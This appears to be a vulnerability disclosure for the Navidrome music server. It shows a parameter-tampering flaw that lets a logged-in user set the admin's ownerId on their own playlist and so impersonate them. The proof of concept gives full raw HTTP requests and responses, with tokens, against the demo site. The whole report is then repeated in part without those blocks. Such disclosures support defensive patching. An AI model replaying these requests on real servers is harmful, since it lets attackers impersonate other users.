Summary
Parameter tampering is a vulnerability where an attacker has the ability to manipulate parameter values in the HTTP requests.
Details
The attacker is able to change the parameter values in the body and successfully impersonate another user. In this case, the attacker created a playlist, added song, posted arbitrary comment, set the playlist to be public, and put the admin as the owner of the playlist.
PoC
- Login as demo user.
- Create new playlist.
- The attacker will need to obtain the owner ID of another user. In this case, it was possible to obtain the owner ID of another user by sending the following request:
GET /api/playlist/ HTTP/2
Host: demo.navidrome.org
Cookie: _ga_CHTWP8NRKH=GS1.2.1713446672.1.1.1713455998.0.0.0; _ga=GA1.2.593362300.1713446672; _gid=GA1.2.66650755.1713446672; X-ND-Client-Unique-Id=58d13f9c-e9a8-45b8-8df1-cd7bbdb2a252; nd-player-64656d6f=ce75e704-38c1-493e-be5f-02aed9aca54d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.navidrome.org/app/
X-Nd-Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG0iOmZhbHNlLCJleHAiOjE3MTM1NDIzOTgsImlhdCI6MTcxMzQ1MzU1OSwiaXNzIjoiTkQiLCJzdWIiOiJkZW1vIiwidWlkIjoiMzFkMmRhODMtZDJjNi00MzQ4LThhMTItZDVlN2YyYjE3MTk2In0.9ReSgp6My_6a-lT0oQhhPoMiVUE7nRFUVV8saFdUHyY
X-Nd-Client-Unique-Id: a74fc1b4-8ceb-458f-ad45-12e0aec05512
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Response:
HTTP/2 200 OK
Alt-Svc: h3=":443"; ma=2592000
Content-Type: application/json
Date: Thu, 18 Apr 2024 16:06:22 GMT
Permissions-Policy: autoplay=(), camera=(), microphone=(), usb=()
Referrer-Policy: same-origin
Server: Caddy
Set-Cookie: X-ND-Client-Unique-Id=a74fc1b4-8ceb-458f-ad45-12e0aec05512; Path=/; Max-Age=31536000; HttpOnly; Secure; SameSite=Strict
Strict-Transport-Security: max-age=31536000;
Vary: Origin
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Nd-Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG0iOmZhbHNlLCJleHAiOjE3MTM1NDI3ODIsImlhdCI6MTcxMzQ1MzU1OSwiaXNzIjoiTkQiLCJzdWIiOiJkZW1vIiwidWlkIjoiMzFkMmRhODMtZDJjNi00MzQ4LThhMTItZDVlN2YyYjE3MTk2In0.woZ7gsCxngtUP2CB_hPlNTNhnAXVr0v_SmluatGEEwg
X-Total-Count: 5
Content-Length: 1779
[{"id":"764308fd-ac10-4ff9-97c6-53d17d383b02","name":"All from Brock Berrigan","comment":"","duration":3039.66,"size":121916830,"songCount":21,**"ownerName":"admin","ownerId":"ed0330d2-4f51-4964-a356-216bdabea948"**,"public":true,"path":"","sync":false,"createdAt":"2023-03-11T18:46:04.502717517Z","updatedAt":"2023-12-28T02:21:01.317387319Z","rules":null,"evaluatedAt":"0001-01-01T00:00:00Z"},<REDACTED>
Return to the playlist you created and edit it. Change the playlist name and add a comment if desired, then submit the request.
Intercept this request and change the value of the parameter ownerId to the admin ID that you obtained as previously explained. Note: You do not need to change the ownerName value, as it will automatically update based on the ownerId. For clarity and better understanding, I changed it in the request to "admin".
PUT /api/playlist/28a84335-31f2-4757-a893-d92856e4025b HTTP/2
Host: demo.navidrome.org
Cookie: _ga_CHTWP8NRKH=GS1.2.1713446672.1.1.1713455864.0.0.0; _ga=GA1.2.593362300.1713446672; _gid=GA1.2.66650755.1713446672; X-ND-Client-Unique-Id=a0c9c415-06ed-440c-adee-7bac9e4ab90c; nd-player-64656d6f=ce75e704-38c1-493e-be5f-02aed9aca54d; _gat=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Content-Length: 372
Referer: https://demo.navidrome.org/app/
X-Nd-Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG0iOmZhbHNlLCJleHAiOjE3MTM1NDIyNTAsImlhdCI6MTcxMzQ1MzU1OSwiaXNzIjoiTkQiLCJzdWIiOiJkZW1vIiwidWlkIjoiMzFkMmRhODMtZDJjNi00MzQ4LThhMTItZDVlN2YyYjE3MTk2In0.hT5cDsfZUCL1vqr-Da1UXBdUgPT43j5QqOR6eDifUrs
X-Nd-Client-Unique-Id: a0c9c415-06ed-440c-adee-7bac9e4ab90c
Origin: https://demo.navidrome.org
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"id":"28a84335-31f2-4757-a893-d92856e4025b","name":"test","comment":"admin user impersonation","duration":178.77,"size":19866778,"songCount":1,**"ownerName":"admin","ownerId":"ed0330d2-4f51-4964-a356-216bdabea948**","public":true,"path":"","sync":false,"createdAt":"2024-04-18T14:48:11.249790581Z","updatedAt":"2024-04-18T15:54:28.441532761Z","rules":null,"evaluatedAt":null}
Forward the request.
The playlist named "test" is created, and the owner is now set as admin. The following request and response demonstrate the successful change of the playlist owner:
GET /api/playlist/ HTTP/2
Host: demo.navidrome.org
Cookie: _ga_CHTWP8NRKH=GS1.2.1713446672.1.1.1713455998.0.0.0; _ga=GA1.2.593362300.1713446672; _gid=GA1.2.66650755.1713446672; X-ND-Client-Unique-Id=58d13f9c-e9a8-45b8-8df1-cd7bbdb2a252; nd-player-64656d6f=ce75e704-38c1-493e-be5f-02aed9aca54d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.navidrome.org/app/
X-Nd-Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG0iOmZhbHNlLCJleHAiOjE3MTM1NDIzOTgsImlhdCI6MTcxMzQ1MzU1OSwiaXNzIjoiTkQiLCJzdWIiOiJkZW1vIiwidWlkIjoiMzFkMmRhODMtZDJjNi00MzQ4LThhMTItZDVlN2YyYjE3MTk2In0.9ReSgp6My_6a-lT0oQhhPoMiVUE7nRFUVV8saFdUHyY
X-Nd-Client-Unique-Id: a74fc1b4-8ceb-458f-ad45-12e0aec05512
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
HTTP/2 200 OK
Alt-Svc: h3=":443"; ma=2592000
Content-Type: application/json
Date: Thu, 18 Apr 2024 16:00:29 GMT
Permissions-Policy: autoplay=(), camera=(), microphone=(), usb=()
Referrer-Policy: same-origin
Server: Caddy
Set-Cookie: X-ND-Client-Unique-Id=a74fc1b4-8ceb-458f-ad45-12e0aec05512; Path=/; Max-Age=31536000; HttpOnly; Secure; SameSite=Strict
Strict-Transport-Security: max-age=31536000;
Vary: Origin
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Nd-Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG0iOmZhbHNlLCJleHAiOjE3MTM1NDI0MjksImlhdCI6MTcxMzQ1MzU1OSwiaXNzIjoiTkQiLCJzdWIiOiJkZW1vIiwidWlkIjoiMzFkMmRhODMtZDJjNi00MzQ4LThhMTItZDVlN2YyYjE3MTk2In0.SHdMgL1IvshQoqVH2_sQDBtOmNj006GRtyi2SJbsfck
X-Total-Count: 5
Content-Length: 1779
<REDACTED>
[{"id":"28a84335-31f2-4757-a893-d92856e4025b","name":"test","comment":"admin user impersonation","duration":178.77,"size":19866778,"songCount":1,**"ownerName":"admin"**,"**ownerId":"ed0330d2-4f51-4964-a356-216bdabea948**","public":true,"path":"","sync":false,"createdAt":"2024-04-18T14:48:11.249790581Z","updatedAt":"2024-04-18T15:58:18.144780493Z","rules":null,"evaluatedAt":null},<REDACTED>
Impact
Each known user is impacted. An attacker can obtain the ownerId from shared playlist information, meaning every user who has shared a playlist is also impacted, as they can be impersonated.
Summary
Parameter tampering is a vulnerability where an attacker has the ability to manipulate parameter values in the HTTP requests.
Details
The attacker is able to change the parameter values in the body and successfully impersonate another user. In this case, the attacker created a playlist, added song, posted arbitrary comment, set the playlist to be public, and put the admin as the owner of the playlist.
PoC
Response:
Return to the playlist you created and edit it. Change the playlist name and add a comment if desired, then submit the request.
Intercept this request and change the value of the parameter ownerId to the admin ID that you obtained as previously explained. Note: You do not need to change the ownerName value, as it will automatically update based on the ownerId. For clarity and better understanding, I changed it in the request to "admin".
Forward the request.
The playlist named "test" is created, and the owner is now set as admin. The following request and response demonstrate the successful change of the playlist owner:
Impact
Each known user is impacted. An attacker can obtain the ownerId from shared playlist information, meaning every user who has shared a playlist is also impacted, as they can be impersonated.